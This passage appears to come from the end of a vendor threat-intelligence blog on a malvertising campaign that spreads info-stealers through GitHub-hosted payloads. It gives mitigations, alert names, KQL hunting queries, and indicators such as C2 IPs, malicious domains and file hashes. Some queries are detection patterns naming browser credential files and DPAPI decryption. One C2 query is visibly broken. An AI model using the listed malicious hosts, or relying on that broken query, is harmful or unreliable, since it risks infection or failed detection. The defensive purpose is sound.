  • Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
  • Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Enable Network Level Authentication for Remote Desktop Service connections.
  • Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem. 
  • AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.
Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • Possible theft of passwords and other sensitive web browser information
  • Possible Lumma Stealer activity
  • Renamed AutoIt tool
  • Use of living-off-the-land binary to run malicious code
  • Suspicious startup item creation
  • Suspicious Scheduled Task Process Launched
  • Suspicious DPAPI Activity
  • Suspicious implant process from a known emerging threat
  • Security software tampering
  • Suspicious activity linked to a financially motivated threat actor detected
  • Ransomware-linked threat actor detected
  • A file or network connection related to a ransomware-linked emerging threat activity group detected
  • Information stealing malware activity
  • Possible NetSupport Manager activity
  • Suspicious sequence of exploration activities
  • Defender detection bypass
  • Suspicious Location of Remote Management Software
  • A process was injected with potentially malicious code
  • Process hollowing detected
  • Suspicious PowerShell download or encoded command execution
  • Suspicious PowerShell command line
  • Suspicious behavior by cmd.exe was observed
  • Suspicious Security Software Discovery
  • Suspicious discovery indicative of Virtualization/Sandbox Evasion
  • A process was launched on a hidden desktop
  • Monitored keystrokes
  • Suspicious Process Discovery
  • Suspicious Javascript process
  • A suspicious file was observed
  • Anomaly detected in ASEP registry
Microsoft Defender for Cloud

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • Detected suspicious combination of HTA and PowerShell
  • Suspicious PowerShell Activity Detected
  • Traffic detected from IP addresses recommended for blocking
  • Attempted communication with suspicious sinkholed domain
  • Communication with suspicious domain identified by threat intelligence
  • Detected obfuscated command line
  • Detected suspicious named pipe communications
Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Github-hosted first-stage payload certificate serial numbers

let specificSerialNumbers = dynamic(["70093af339876742820d7941", "15042512e67e8275f3f7f36b", "5608cab7e2ce34d53abcbb73", "0fa27d2553f24da79d1cc6bd8773ee9a", "7a7bf2ae0cbc0f5500db2946", "30d6c83a715bddb32e7956fe52d6b352", "301385aa36fae635e74bb88e", "30013cbbb16a7fd3c57f82707fb99c32", "5d00264a6b804ae6b28d9b16", "3a9c76f8304f77bd271921d9982f1ab6", "01f2c6c363767056abd80e9c", "0b09c88c0c8d15bed51a9eb4440f4bb0"]); union ( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp ), ( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate )

Dropbox-hosted first-stage payload certificate serial number

Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. This query will search for the unique serial number of the known certificate related to this activity.

let specificSerialNumbers = dynamic(["7a7bf2ae0cbc0f5500db2946"]); union ( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp ), ( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate )

Second-stage C2 IP addresses

Surface devices that may have communicated with second stage C2 IP addresses related to this activity.

let ipAddressToSearch = dynamic(["159.100.18.192", "192.142.10.246", "79.133.46.35", "84.200.24.191", "84.200.24.26", "89.187.28.253", "185.92.181.1"]); union isfuzzy=true ( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields) ), ( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query ), ( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent ), ( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName ), ( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent ), ( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine ), ( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType ), ( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent ), ( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent ) | sort by Timestamp desc

Fourth-stage C2 IP addresses

Surface devices that may have communicated with fourth stage C2 IP addresses related to this activity.

let ipAddressToSearch = dynamic(["45.141.84.60", "91.202.233.18", "154.216.20.131", "5.10.250.240", "79.132.128.77"]); union isfuzzy=true ( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, o), ( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query ), ( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent ), ( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName ), ( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent ), ( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine ), ( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType ), ( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent ), ( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent ) | sort by Timestamp desc

Browser remote debugging 

Identify AutoIT scripts launching chromium-based browsers (such as chrome.exe, msedge.exe, brave.exe) in remote debugging mode.

DeviceProcessEvents | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" // Check for "AutoIt" scripts, even if it's renamed. | where ProcessCommandLine has "--remote-debugging-port" // Identify Chromium based browsers (chrome.exe, msedge.exe, brave.exe etc) being launched in remote debugging mode. | project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

DPAPI decryption via AutoIT

Identify DPAPI decryption activity originating from AutoIT scripts.

DeviceEvents | where ActionType == "DpapiAccessed" | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" | where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect")) | extend json = parse_json(AdditionalFields) | extend dataDesp = tostring(json.DataDescription.PropertyValue) | extend opType = tostring(json.OperationType.PropertyValue) | where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect") | project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

DPAPI decryption via LOLBAS binaries

Identify DPAPI decryption activity originating from LOLBAS binaries (RegAsm.exe and MSBuild.exe).

DeviceEvents | where ActionType == "DpapiAccessed" | where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe") | where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect")) | extend json = parse_json(AdditionalFields) | extend dataDesp = tostring(json.DataDescription.PropertyValue) | extend opType = tostring(json.OperationType.PropertyValue) | where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect") | project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

Sensitive browser file access via AutoIT

Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\"); let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db"); DeviceEvents | where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events. | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields) | extend File_Name = tostring(json.FileName.PropertyValue) | where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles)) | project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Sensitive browser file access via LOLBAS binaries

Identify LOLBAS binaries (RegAsm.exe and MSBuild.exe) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\"); let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db"); DeviceEvents | where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events. | where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe") | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields) | extend File_Name = tostring(json.FileName.PropertyValue) | where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles)) | project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Streaming website domains with malicious iframe

Indicator Type  movies7[.]net Domain 0123movie[.]art Domain

Malicious iframe redirector domains

Indicator Type  fle-rvd0i9o8-moo[.]com Domain 0cbcq8mu[.]com Domain

Malvertisement distributor

Indicator Type  widiaoexhe[.]top Domain

Malvertising website domains

Indicator Type widiaoexhe[.]top Domainpredictivdisplay[.]com Domainbuzzonclick[.]com Domainpulseadnetwork[.]com Domainonclickalgo[.]comDomainliveadexchanger[.]comDomaingreatdexchange[.]comDomaindexpredict[.]comDomainonclickperformance[.]comDomain

GitHub referral URLs

Indicator Type hxxps://pmpdm[.]com/webcheck35/URLhxxps://startherehosting[.]net/todaypage/URLhxxps://kassalias[.]com/pageagain/URLhxxps://sacpools[.]com/pratespage/URLhxxps://dreamstorycards[.]com/amzpage/URLhxxps://primetimeessentials[.]com/newpagyes/URLhxxps://razorskigrips[.]com/perfect/URLhxxps://lakeplacidluxuryhomes[.]com/webpage37URLhxxps://ageless-skincare[.]com/gn/URLhxxps://clarebrownmusic[.]com/goodday/URLhxxps://razorskigrips[.]com/gn/URLhxxps://compass-point-yachts[.]com/nicepage77/pro77.phpURLhxxps://razorskigrips[.]com/goodk/URLhxxps://lilharts[.]com/propage6/URLhxxps://enricoborino[.]com/propage66/URLhxxps://afterpm[.]com/pricedpage/URLhxxps://eaholloway[.]com/updatepage333/URLhxxps://physicaltherapytustin[.]com/webhtml/URLhxxps://physicaltherapytustin[.]com/web-X/URLhxxps://razorskigrips[.]com/newnewpage/URLhxxps://statsace[.]com/web_us/URLhxxps://nationpains[.]com/safeweb3/URLhxxps://vjav[.]com/URLhxxps://thegay[.]com/URLhxxps://olopruy[.]com/URLhxxps://desi-porn[.]tube/URLhxxps://cumpaicizewoa[.]net/partitial/URLhxxps://ak.ptailadsol[.]net/partitial/URLhxxps://egrowz[.]com/webview/URLhxxps://or-ipo[.]com/nice/URL

GitHub URLs

Indicator Type hxxps://github[.]com/down4up/ URLhxxps://github[.]com/g1lsetup/iln77URLhxxps://github[.]com/g1lsetup/v2025URLhxxps://github[.]com/git2312now/DownNew152/URLhxxps://github[.]com/muhammadshahblis/URLhxxps://github[.]com/JimelecarURLhxxps://github[.]com/kloserwURLhxxps://github[.]com/kopersparan/URLhxxps://github[.]com/zotokilowaURLhxxps://github[.]com/colvfile/bmx84542URLhxxps://github[.]com/colvfile/yesyes333URLhxxps://github[.]com/mp3andmovies/URLhxxps://github[.]com/anatfile/newlURLhxxps://github[.]com/downloadprov/wwwURLhxxps://github[.]com/abdfilesup/readyyesURLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898537481URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898072392/ URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902107140URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902405338URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901430321/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903047306/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899121225URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899472962/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/900979287/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901553970URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901617842/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/897657726URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903499100/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903509708/URLhxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/915668132/URL

DropBox URL

Indicator Type hxxps://uc8ce1a0cf2efa109cd4540c0c22.dl.dropboxusercontent[.]com/cd/0/get/CgHUWBzFWtX1ZE6CwwKXVb1EvW4tnDYYhbX8Iqj70VZ5e2uwYlkAq6V-xQcjX0NMjbOJrN3_FjuanOjW66WdjPHNw2ptSNdXZi4Sey6511OjeNGuzMwxtagHQe5qFOFpY2xyt1sWeMfLwwHkvGGFzcKY/file?dl=1# URL

Discord URL

Indicator Typehxxps://cdn.discordapp[.]com/attachments/1316109420995809283/1316112071376769165/NativeApp_G4QLIQRa.exe URL

First stage GitHub-hosted payloads

FilenameSHA-256NanoPhanoTool.execd207b81505f13d46d94b08fb5130ddae52bd1748856e6b474688e590933a718Squarel_JhZjXa.exeb87ff3da811a598c284997222e0b5a9b60b7f79206f8d795781db7b2abd41439PriceApp_1jth1MMk.exeef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fefParanoide.exe5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942AliasApp.exe0c2d5b2a88a703df4392e060a7fb8f06085ca3e88b0552f7a6a9d9ef8afdda03X-essentiApp.exed8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45QilawatProtone.exe823d37f852a655088bb4a81d2f3a8bfd18ea4f31e7117e5713aeb9e0443ccd99ElectronApp.exe588071382ac2bbff6608c5e7f380c8f85cdd9e6df172c5edbdfdb42eb74367dcNativeApp_dRRgoZqi.exedd8ce4a2fdf4af4d3fc4df88ac867efb49276acdcacaecb0c91e99110477dbf2NativeApp_G5L1NHZZ.exe380920dfcdec5d7704ad1af1ce35feba7c3af1b68ffa4588b734647f28eeabb7NativeApp_86hwwNjq.exe96cc7c9fc7ffbda89c920b2920327a62a09f8cb4fcf400bbfb02de82cdd8dba1NativeApp_01C02RhQ.exe800c5cd5ec75d552f00d0aca42bdade317f12aa797103b9357d44962e8bcd37aApp_aeIGCY3g.exeafdc1a1e1e934f18be28465315704a12b2cd43c186fbee94f7464392849a5ad0Pictore.exede6fcdf58b22a51d26eacb0e2c992d9a894c1894b3c8d70f4db80044dacb7430ScenarioIT.exef677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541CiscoProton.exe7b88f805ed46f4bfc3aa58ef94d980ff57f6c09b86c14afa750fc41d32b7ada8Alarmer.exedc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620fAevellaAi.2.exe3e8ef8ab691f2d5b820aa7ac805044e5c945d8adcfc51ee79d875e169f925455avs.exed2e9362ae88a795e6652d65b9ae89d8ff5bdebbfec8692b8358aa182bc8ce7a4mrg.exe113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1mrg.exe732b4874ac1a1d4326fc1d71d16910fce2835ceb87e76ad4ef2e40b1e948a6ccApplication.exeaea0892bf9a533d75256212b4f6eaede2c4c9e47f0725fc3c61730ccfba25ec8Application.exeea2e21d0c09662a0f9b42d95ce706b5ed26634f20b9b5027ec681635a4072453SalmonSamurai.exe83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5Arendada.exe47ef2b7e8f35167fab1ecdd5ddb73d41e40e6a126f4da7540c1c0394195cb3dfArduino.exe92d457b286fb63d2f5ec9413fd234643448c5f8d2c0763e43ed5cf27ab47eb02SecondS.exe9d5c551f076449af0dbd7e05e1c2e439d6f6335b3dd07a8fa1b819c250327f39ultraedit.msi0e20bea91c3b70259a7b6eef3bff614ce9b6df25e078bc470bfef9489c9c76e6

First-stage Dropbox-hosted payload

FilenameSHA-256App_File-x38.3.exec0bc1227bdc56fa601c1c5c0527a100d7c251966e40b2a5fa89b39a2197dda67

First-stage Discord-hosted payload

FilenameSHA-256NativeApp_G4QLIQRa.exe87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d

Certificate signatures of GitHub-hosted payloads

Indicator c855f7541e50c98a5ae09f840fa06badb97ab46c94c21e6384f2ffb72bd856c1c40b788f314b529874df2582af3780d81a8071e260c2b04259efc35a07728484b1bb8702a87c6e5a154e0d690af2ff38901f3fe4e599cd155132ce2b6bf3c5f6d1e0387cbe7156bd07dd7f72521fae4a3d6f46c48dd2ce9e686b7ebba606303b5085633fcaa0685272b4d9b974a8215a54f52f792d351d66bd56a0ac626474fb561620a3f0bf4fb96898a99252b85b00c468e5af8137f599ac036b0eaae9486158e40e90ebdbce94E9007755cfe5643d18618786de1995914098307f

Certificate signature of Dropbox-hosted payload

Indicator  fa6146f1fdad58b8db08411c459cb70acf82846d

Second-stage payloads

File nameSHA-256NanoTool.exe9f958b85dc42ac6301fe1abfd4b11316b637c0b8c0bf627c9b141699dc18e885Squarel.exe29539039c19995d788f24329ebb960eaf5d86b1f8df76272284d08a63a034d42ParanoidResolver.exe1f73a00b5a7ac31ffc89abbedef17ee2281cf065423a3644787f6c622295ff29AliasInstall.exe997671c13bb78a9acc658e2c3a1abf06aedc4f1f4f1e5fd8d469a912fc93993bIoNixNginx.exe1d8ab53874b2edfb058dd64da8a61d92c8a8e302cc737155e0d718dbe169ba36QilawatProton.exe 885f8a704f1b3aaa2c4ddf7eab779d87ecb1290853697a1e6fb6341c4f825968ProtonEditor.exe48f422bf2b878d142f376713a543d113e9f964f6761d15d4149a4d71441739e5AlEditor.exe 9daa63046978d7097ea20bfbb543d82374cf44ba37f966b87488f63daf20999eScielfic.exe6ec86b4e200144084e07407200a5294985054bdaddb3d6c56358fc0657e48157Pictore.exe18959833da3df8d5d8d19c3fce496c55aa70140824d3a942fe43d547b9a8c065AlarmWalker Solid.exe552f23590bdf301f481e62a9ce3c279bab887d64f4ba3ea3d81a348e3eff6c45Aevella.exe 2a738f41b42f47b64be7dc2d16a4068472b860318537b5076814891a7d00b3bbApplication.exe5b50d0d67db361da72af2af20763b0dde9e5e86b792676acb9750f32221e955cArchiverApp.execfeac95017edbfe9a0ad8f24e7539f54482012d11dc79b7b6f41ff4ff742d9c6LakerBaker.exeaf7454ca632dead16a36da583fb89f640f70df702163f5a22ba663e985f80d88NanoTool.exeefdcd37ee0845e0145084c2a10432e61b1b4bf6b44ecd41d61a54b10e3563650DisplayPhotoViewer.exe86ae0078776c0411504cf97f4369512013306fcf568cc1dc7a07e180dde08edaCheryLady Application.exe773d3cb5edef063fb5084efcd8d9d7ac7624b271f94706d4598df058a89f77fdSalmonSamurai.exe40abba1e7da7b3eaad08a6e3be381a9fc2ab01b59638912029bc9a4aa1e0c7a7Heaveen Application.exe39dbf19d5c642d48632bfaf2f83518cfbd2b197018642ea1f2eb3d81897cf17dCisco Application.exe234971ecd1bf152c903841fac81bdaa288954a2757a73193174cde02fa6f937bSimplify.exe221615de3d66e528494901fb5bd1725ecda336af33fe758426295f659141b931SecondS.tmp5185f953be3d0842416d679582b233fdc886301441e920cb9d11642b3779d153

Second-stage C2s

Indicator Type 159.100.18[.]192 C2192.142.10[.]246 C279.133.46[.]35C284.200.24[.]191C284.200.24[.]26C289.187.28[.]253 C2185.92.181[.]1C2188.245.94[.]250 C2

Third-stage payloads: .exe and PowerShell files

File nameSHA-256ApproachAllan.exe4e5fafffb633319060190a098b9ea156ec0243eb1279d78d27551e507d937947DiscoConvicted.exe008aed5e3528e2c09605af26b3cda88419efb29b85ed122cab59913c18f7dc75AwesomeTrader.exe21d4252a6492270f24282f8de9e985c9b8c61412f42d169ff4b128fd689d4753CiteLips.exec9713c06526673bf18dbdaf46ea61ca9dd8fefe8ceec3be06c63db17e01e3741RepublicChoir.exef649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b6Zh7MvxYtHTBFX90Mn.exeb96360d48c2755ded301dd017b37dfdce921bdea7731c4b31958d945c8a0b8f5ExclusivePottery.exe54c8a4f58b548c0cf6dbea2522e258723263ccde11d23e48985bdd1fd3535ce2squarel.ps1d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbMadCountries.exe9fe2c00641ece18898267b3c6e4ee0cb82ffefbc270c0767c441c3f38b63a12aHockeyTract.exef136fa82ff73271708afe744f4e6a19cd5039e08ecd3ddad8e4d238f338f4d58BruneiPlugins.exe453de65c9cc2dc62a67c502cd8bc26968acad9a671c1e095312c1fa6db4a7c74CnnCylinder.exea76548a500d81dbb6f50419784a9b0323f5e42245ac7067af2adee0558167116specreal.ps1d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbInflationWinston.exedfbba64219fc63815db538ae8b51e07ec7132f4b39ba4a556c64bd3a5f024c2dnetsup.ps1 d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbbCfUltra.exe7880714c47260dba1fd4a4e4598e365b2a5ed0ad17718d8d192d28cf75660584CalvinShoppercom.exe345a898d5eab800b7b7cbd455135c5474c5f0a9c366df3beb110f225ba734519EscortUnavailable.exe258efd913cccdb70273c9410070f093337d5574b74c683c1cdff33baff9ffd7cDisagreeProceed.exe9c82a2190930ec778688779a5ad52537d8b0856c8142c71631b308f1f8f0e772BarbieBiblical.exe34f43bfc0a6f0d0f70b6eee0fa29c6dc62596ab2b867bbabd27c68153ea47f24MysqlManaging.exeef1f9d507a137a4112ac92c576fc44796403eb53d71fe2ddb00376419c8a604ePillsHarvest.exe4af3898ba3cf8b420ea1e6c5ce7cdca7775a4c9b78f67b493a9c73465432f1d3BelfastProt.exead470bffbd120fc3a6c2c2e52af3c12f9f0153e76fee5e2b489a3d1870bdff03HowardLikelihood.execc08892ace9ac746623b9d0178cd4d149f6a9ab10467fb9059d16f2c0038dcf9SorryRequiring.exe4a2346d453b2ac894b67625640347c15e74e3091a9aa15629c3a808caaff1b2bSearchMed.exeb0aab51b5e4a9cdd5b3d2785e4dea1ec06b20bc00e4015ccd79e0ba395a20fbdRepublicChoir.exef649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426bDesignersCrawford.exee8452a65a452abdb4b2e629f767a038e0792e6e2393fb91bf17b27a0ce28c936HumanitarianProvinces.exe25cfd6e6a9544990093566d5ea9d7205a60599bfda8c0f4d59fca31e58a7640bResetEngaging.exe51fbc196175f4fb9f38d843ee53710cde943e5caf1b0552624c7b65e6c231f7eEducationalDerby.exe4a9a8c46ff96e4f066f51ff7e64b1c459967e0cdeb74b6de02cf1033e31c1c7bStringsGrill.exef2a8840778484a56f1215f0fa8f6e8b0fb805fce99e62c01ff0a1f541f1d6808CongressionalMechanics.exe2060509a63180c2f5075faf88ce7079c48903070c1c6b09fa3f9d6db05b8d9daSexuallyWheat.exed39075915708d012f12b7410cd63e19434d630b2b7dbe60bd72ce003cd2efeafPerceptionCircuits.exe0e7dd3aa100d9e22d367cb995879ac4916cb4feb1c6085e06139e02cc7270bbaWWv63SKrHflebBd4VW.ps1483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64WritingsShanghai.exefa131ea3ce9a9456e1d37065c7f7385ce98ffa329936b5fdd0fd0e78ade88ecbIUService.exed5a6714ab95caa92ef1a712465a44c1827122b971bdb28ffa33221e07651d6f7RttHlp.exe8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473ASmartService.exe75712824b916c1dc8978f65c060340dc69b1efa0145dddbf54299689b9f4a118ClaireSpecifically.exe746abef4bde48da9f9bff3c23dd6edf8f1bea4b568df2a7d369cb30536ec9ce0report.exe6daccc09f5f843b1fa4adde64ad282511f591a641cb474e123fed922167df6aexh6yIa7PXFCsasc0H5.exe5f17501193f5f823f419329bc20534461a7195aa4c456e27af6b0df5b0788041yL6Iwcawoz3KDjg60m.exe5ecb4240fae36893973fb306c52c7e548308ebcfba6d101aad4e083407968a96CustomsCampbell.exe5b80c7d65bb655ccb6e3264f4459a968edcda28084e0ddde16698f642b2d7d83HoldemRover.exe4c60cdd1ee4045eb0